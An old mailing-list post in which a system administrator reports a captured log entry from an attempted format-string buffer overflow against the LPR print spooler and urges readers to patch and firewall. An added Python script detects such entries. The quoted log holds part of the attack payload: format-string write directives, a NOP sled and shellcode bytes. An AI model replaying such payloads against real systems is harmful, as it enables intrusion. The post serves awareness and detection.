
Important SECURITY Information - READ CAREFULLY



I was online from home last night, and noticed *972* new entries 
in my /var/log/messages similar to the following one:

-------------------------------------------------------------------------------
Apr  8 17:29:43 pc1h SERVER[7596]: Dispatch_input: bad request line 'BB<DC><F3>
<FF><BF><DD><F3><FF><BF><DE><F3><FF><BF><DF><F3><FF><BF>XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2201<DB>1<C9>1<C0><B0>F<CD>\200\211<E5>1<D2><B2>f\211<D0>1<C9>\211<CB>C!
\211]<F8>C\211]<F4>K\211M<FC>\215M<F4><CD>\2001
<C9>\211
-------------------------------------------------------------------------------

PID 7596 was not running, and not knowing what the process 
"SERVER" was, I was puzzled for a while.

After a little research, I found that "SERVER" is the print
spooler, and someone tried to CRACK my system by exploiting
a known buffer overflow bug in LPR !!!!!!
  http://www.redhat.com/support/errata/RHSA-2000-065.html

I was never so glad that I keep my system updated with the
latest errata in my life!!!

So, if you think you're safe with a dialup connection and
a random IP address, think again!!!  I dial up from home 
and connect with a random IP address!

It's definitely worth the time to keep your system updated
and to set up a firewall.  If you haven't, do it NOW!
There have been a lot of security advisories lately, like
a really nasty NTP bug found a few days ago.  (a last
minute addition to this week's BSware)

I really didn't plan this as a plug for the upcoming KLUG
presentations on security, but it is rather timely.  A
perfect opportunity for you to learn about Linux security!

--------------------------------------------
Bruce Smith                bruce@armintl.com
System Administrator / Network Administrator
Armstrong International, Inc.
Three Rivers, Michigan  49093  USA
http://www.armstrong-intl.com/
--------------------------------------------
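
Added example, not part of the original post: a small Python scan for log entries like the one quoted above, flagging printf-style `%n` write directives and long `\220` (byte 0x90) runs in syslog messages and counting them per host and service. The sample lines are constructed, and the function names and the 16-byte threshold are assumptions of this example.

```python
import re
from collections import Counter

# Classic syslog layout: "Mon DD HH:MM:SS host tag[pid]: message"
SYSLOG = re.compile(
    r"^(\w{3}\s+\d+\s[\d:]{8})\s(\S+)\s([^\[\s:]+)(?:\[(\d+)\])?:\s(.*)$")
# printf write directives such as %n, %hn or the positional %300$n
WRITE_DIRECTIVE = re.compile(r"%(?:\d+\$)?(?:hh|h|ll|l)?n")
# syslog prints byte 0x90 as the octal escape \220; 16+ in a row (assumed
# threshold) is treated as padding rather than ordinary request text
NOP_RUN = re.compile(r"(?:\\220){16,}")


def inspect(line):
    """Return a finding dict for a suspicious syslog line, else None."""
    m = SYSLOG.match(line)
    if not m:
        return None
    ts, host, tag, pid, msg = m.groups()
    writes = len(WRITE_DIRECTIVE.findall(msg))
    run = NOP_RUN.search(msg)
    nops = len(run.group()) // 4 if run else 0  # each "\220" is 4 characters
    if not writes and not nops:
        return None
    return {"time": ts, "host": host, "tag": tag, "pid": pid,
            "writes": writes, "nops": nops}


def summarize(lines):
    """Count suspicious entries per (host, tag) pair."""
    hits = (inspect(l) for l in lines)
    return Counter((h["host"], h["tag"]) for h in hits if h)


# Constructed sample lines, shortened from the shape of the quoted entry
SAMPLE = [
    "Apr  8 17:29:43 pc1h SERVER[7596]: Dispatch_input: bad request line "
    "'BBXXXX%.156u%300$n%.21u%301$nsecurity%302$n" + "\\220" * 40 + "'",
    "Apr  8 17:30:02 pc1h SERVER[7601]: Dispatch_input: bad request line 'hello'",
    "Apr  8 17:31:10 pc1h sshd[812]: Accepted password for user from 10.0.0.5",
]

if __name__ == "__main__":
    for line in SAMPLE:
        finding = inspect(line)
        if finding:
            print(finding)
    print(dict(summarize(SAMPLE)))
```

Run against a real log by passing `open("/var/log/messages", errors="replace")` to `summarize()`.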